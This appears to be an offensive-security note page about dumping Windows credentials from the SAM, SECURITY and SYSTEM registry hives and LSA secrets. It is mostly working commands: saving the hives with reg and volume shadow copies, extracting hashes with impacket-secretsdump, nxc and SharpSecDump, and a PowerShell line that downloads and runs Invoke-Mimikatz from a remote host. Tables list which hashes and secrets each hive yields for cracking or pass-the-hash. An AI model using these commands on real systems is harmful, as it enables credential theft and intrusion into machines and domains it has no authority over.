N1NJ10

Resources

General
- How LSA works : https://www.passcape.com/index.php?section=docsys&cmd=details&id=23
Evasion
- By orangecyberdefense : https://www.orangecyberdefense.com/no/blog/cybersecurity/dumping-lsa-secrets-a-story-about-task-decorrelation
- Change computer Password : https://pentest.party/posts/2025/ksetup-machine-password/

Cheat sheet

ired.team : https://www.ired.team/offensive-security/credential-access-and-credential-dumping/

Commands

Windows

LOL

Reg.exe

reg save hklm\system system.hive
reg save hklm\sam sam.hive
reg save hklm\security security.hive
 
impacket-secretsdump -system system.hive -security security.hive -sam sam.hive -history local

Vssadmin

# Work on cmd 
wmic shadowcopy call create volume='C:\'
vssadmin list shadows
 
copy \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy1\windows\system32\config\sam sam.hive
copy \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy1\windows\system32\config\security security.hive
copy \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy1\windows\system32\config\system system.hive

Tools

Mimikatz

IEX (New-Object Net.WebClient).DownloadString('http://192.168.99.23/PowerShell/Invoke-Mimikatz.ps1')
 
Invoke-Mimikatz -Command '"privilege::debug" "token::elevate" "log out.txt" "lsadump::sam" "lsadump::secrets" "lsadump::cache" "exit"'

SharpSecDump

.\SharpSecDump.exe -d=redteamrecipes.com -u=administrator -p=Password123#a -target='192.168.99.25'
 
Invoke-SharpSecDump -Command "-d=redteamrecipes.com -u=administrator -p=Password123#a -target=192.168.99.25"
 
# Connects to RPC vis SMB share ADMIN$ , IPC$ then decrypt them then dump them

Linux

nxc

nxc smb 192.168.99.10 -u fmoheb -p Password123#f [--lsa] [--sam]

Impacket

impacket-secretsdump redteamrecipes.com/administrator:Password123#a@192.168.99.25 -pwd-last-set -user-status -history

Tricks

Check services

impacket-services 'redteamrecipes.com/administrator:Password123#a@192.168.99.25' status -name RemoteRegistry
 
Get-Service RemoteRegistry
Start-Service RemoteRegistry
Stop-Service RemoteRegistry -Force

Tools

Notes

Permissions

To use reg.exe save to dump the registry hives (SAM, SYSTEM, SECURITY), you need the SeBackupPrivilege (Back up files and directories), By default, only two groups have this privilege:

Administrators (Most common)

Backup Operators (A “lower” privilege group often targeted by Red Teamers because it can still dump hashes)

Try using whoami /priv

Windows Registry Hives: The Holy Trinity

A comparison of the three critical files required for credential dumping.

Feature SAM (Security Accounts Manager) SECURITY (LSA & Cache) SYSTEM (Configuration & Keys)
Primary Role The Database for Local Users. The Vault for System & Domain secrets. The Master Key holder.
What it Stores • Local User NTLM Hashes.
• Local Groups.
• User RIDs (e.g., Admin 500). • Cached Domain Logins (DCC2/MSCASH).
• LSA Secrets (Service passwords).
• Machine Account Password ($MACHINE.ACC). • The Boot Key (SysKey).
• System config & drivers.
Encryption Encrypted by the Boot Key. Encrypted by the Boot Key. Contains the obfuscated keys to build the Boot Key.
Dependency Cannot be opened without SYSTEM. Cannot be opened without SYSTEM. Required to unlock the other two.
Red Team Loot Local Admin access (Pass-the-Hash). Domain User hashes (Crack offline) & Service passwords. Ability to decrypt the SAM and SECURITY hives.
Registry Path HKLM\SAM HKLM\SECURITY HKLM\SYSTEM
File Path C:\Windows\System32\config\SAM C:\Windows\System32\config\SECURITY C:\Windows\System32\config\SYSTEM

Feature	SAM (Security Accounts Manager)	SECURITY (LSA & Cache)	SYSTEM (Configuration & Keys)
Primary Role	The Database for Local Users.	The Vault for System & Domain secrets.	The Master Key holder.
What it Stores	• Local User NTLM Hashes. • Local Groups. • User RIDs (e.g., Admin `500`).	• Cached Domain Logins (DCC2/MSCASH). • LSA Secrets (Service passwords). • Machine Account Password (`$MACHINE.ACC`).	• The Boot Key (SysKey). • System config & drivers.
Encryption	Encrypted by the Boot Key.	Encrypted by the Boot Key.	Contains the obfuscated keys to build the Boot Key.
Dependency	Cannot be opened without SYSTEM.	Cannot be opened without SYSTEM.	Required to unlock the other two.
Red Team Loot	Local Admin access (Pass-the-Hash).	Domain User hashes (Crack offline) & Service passwords.	Ability to decrypt the SAM and SECURITY hives.
Registry Path	`HKLM\SAM`	`HKLM\SECURITY`	`HKLM\SYSTEM`
File Path	`C:\Windows\System32\config\SAM`	`C:\Windows\System32\config\SECURITY`	`C:\Windows\System32\config\SYSTEM`

Windows Auth: The Bank Analogy

A breakdown of the Windows security architecture components.

Acronym Type Role (The Analogy) Technical Function Red Team Goal
LSA Concept The Rulebook The subsystem that defines security policies. N/A (It’s just the logic).
LSASS Process The Guard The active worker that verifies passwords and unlocks vaults. Dump its memory (Mimikatz) to steal everything in RAM.
SAM File Local Notebook Database of Local User NTLM hashes. Steal to crack local Admin passwords.
SECURITY File Deposit Box Database of Cached Domain hashes & Service secrets. Steal to crack Domain User passwords (DCC2) & LSA Secrets.
SYSTEM File The Master Key Contains the Boot Key (SysKey) to unlock the other files. Steal to decrypt the SAM and SECURITY hives.

Index

SAM, System,LSA and Security

Resources

Cheat sheet

Commands

Tools

Notes

Get Updated

Graph View

Table of Contents

Backlinks

Acronym	Type	Role (The Analogy)	Technical Function	Red Team Goal
LSA	Concept	The Rulebook	The subsystem that defines security policies.	N/A (It’s just the logic).
LSASS	Process	The Guard	The active worker that verifies passwords and unlocks vaults.	Dump its memory (Mimikatz) to steal everything in RAM.
SAM	File	Local Notebook	Database of Local User NTLM hashes.	Steal to crack local Admin passwords.
SECURITY	File	Deposit Box	Database of Cached Domain hashes & Service secrets.	Steal to crack Domain User passwords (DCC2) & LSA Secrets.
SYSTEM	File	The Master Key	Contains the Boot Key (SysKey) to unlock the other files.	Steal to decrypt the SAM and SECURITY hives.